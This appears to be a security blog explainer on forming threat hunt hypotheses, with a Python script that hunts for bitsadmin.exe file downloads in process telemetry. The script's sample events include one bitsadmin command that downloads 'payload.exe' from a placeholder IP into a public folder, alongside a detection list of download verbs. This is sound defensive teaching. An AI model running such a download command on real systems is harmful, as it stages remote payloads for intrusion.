What is a Threat Hunt Hypothesis?

A threat hunt hypothesis is a proposed explanation, made on the basis of limited evidence from a security environment, that serves as the starting point for further investigation. Much like a scientific hypothesis, it is a statement of an idea or explanation to be tested against data, as in the following example:

Hypothesis: A threat actor can use bitsadmin.exe to download a file to an endpoint on the organization's network.

A hunt hypothesis can be generated from many sources, including new zero-day vulnerabilities, threat actor research, threat intelligence, security control gaps, and incident reports. Regardless of the source, the foundations of a good hypothesis are Relevance and Testability:

Relevance – How does the hypothesis relate to organizational needs, current industry trends, and available data sources?

Testability – Do the available data sources and tools give a realistic chance of confirming or refuting what the hypothesis proposes? A hypothesis that depends on telemetry the organization does not collect (for example, process command lines) cannot be tested, however relevant it is.
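The bitsadmin.exe hypothesis above can be turned into a concrete hunt, and the Testability question can be answered with the same data. The following Python is an added example, not Deepwatch's code: it first checks whether the process-creation telemetry actually carries command lines (without them the hypothesis is untestable), then flags bitsadmin.exe invocations that fetch a remote URL to a local file. The event field names (Computer, Image, CommandLine), the sample events, and the list of download verbs are assumptions chosen to resemble Sysmon Event ID 1 / Windows 4688 records.

```python
"""Hunt for: a threat actor uses bitsadmin.exe to download a file to an endpoint.

Added example, not Deepwatch's code. Events are constructed to resemble
Sysmon EID 1 / Windows 4688 fields; field names and samples are assumptions.
"""
import re

# Constructed sample telemetry: one dict per process-creation event.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /transfer job1 /download /priority high "
                    "http://203.0.113.10/payload.exe C:\\Users\\Public\\p.exe"},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},            # enumeration only
    {"Computer": "WS03", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"Computer": "WS04", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /addfile myjob https://cdn.example.net/update.msi "
                    "C:\\temp\\update.msi"},                 # possibly legitimate
    # Host where command-line auditing is off: the CommandLine field is absent.
    {"Computer": "WS05", "Image": r"C:\Windows\System32\bitsadmin.exe"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# bitsadmin verbs that cause a remote URL to be written to a local file
# (assumed list for this example; extend it as you learn more about the tool).
DOWNLOAD_VERBS = ("/transfer", "/addfile")


def _is_bitsadmin(event):
    """True when the created process image is bitsadmin.exe (case-insensitive)."""
    return event["Image"].lower().endswith("\\bitsadmin.exe")


def check_testability(events):
    """Testability check: fraction of bitsadmin.exe events that carry a
    CommandLine field. If this is low, the data source cannot support the
    hypothesis and command-line auditing must be enabled first."""
    bits = [e for e in events if _is_bitsadmin(e)]
    if not bits:
        return 0.0
    with_cmd = sum(1 for e in bits if e.get("CommandLine"))
    return with_cmd / len(bits)


def hunt_bitsadmin_downloads(events):
    """Return events where bitsadmin.exe is invoked with a download verb and a
    remote URL on the command line. Hits are leads to triage, not verdicts."""
    hits = []
    for e in events:
        if not _is_bitsadmin(e):
            continue
        cmd = e.get("CommandLine", "")
        match = URL_RE.search(cmd)
        if match and any(v in cmd.lower() for v in DOWNLOAD_VERBS):
            hits.append({"Computer": e["Computer"],
                         "url": match.group(0),
                         "CommandLine": cmd})
    return hits


if __name__ == "__main__":
    coverage = check_testability(SAMPLE_EVENTS)
    print(f"bitsadmin events with command lines: {coverage:.0%}")
    for hit in hunt_bitsadmin_downloads(SAMPLE_EVENTS):
        print(f"{hit['Computer']}: {hit['url']}")
```

On the constructed sample the testability check reports 75% command-line coverage (WS05 would be invisible to the hunt), and the hunt returns two leads, WS01 and WS04. The second looks like a software update, which is the point of a hunt: the query tests the hypothesis, and the analyst decides which results are benign and which become an incident.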

Looking for more information on Threat Hunting? Take a deep dive into Threat Hunting and a TTP-based hunt example with deepwatcher Adam Schmitz in his blog article: Threat Hunting in Splunk.

